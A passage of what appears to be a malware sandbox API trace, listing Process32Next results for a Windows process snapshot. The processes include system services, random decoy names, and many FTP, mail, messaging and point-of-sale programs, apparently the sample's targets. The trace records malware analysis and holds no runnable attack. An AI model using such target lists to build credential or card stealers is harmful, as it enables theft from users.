lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0244.339] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.343] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.345] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0244.346] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.348] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.349] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.351] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.352] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.354] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.355] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.425] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0244.426] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0244.428] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0244.429] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.431] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0244.433] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0244.435] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0244.439] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0244.440] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.442] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0244.444] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0244.445] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0244.447] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0244.448] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0244.452] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0244.454] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0244.455] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0244.457] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0244.458] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0244.460] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0244.461] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0244.463] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0244.464] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0244.531] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0244.532] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0244.534] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0244.535] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0244.537] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0244.538] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0244.540] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0244.542] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0244.546] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0244.548] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0244.549] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0244.551] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0244.552] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0244.554] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0244.555] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0244.557] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0244.562] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0244.563] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0244.565] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0244.567] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0244.569] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0244.571] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0244.573] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0244.626] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0244.629] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0244.632] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0244.634] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0244.637] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0244.642] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0244.644] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0244.645] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0244.647] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0244.649] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0244.650] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0244.652] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0244.657] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0244.659] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0244.660] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0244.662] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0244.663] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0244.665] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0244.667] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0244.728] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0244.729] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0244.731] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0244.733] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0244.734] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0244.736] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0244.737] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0244.739] Process32Next (in: 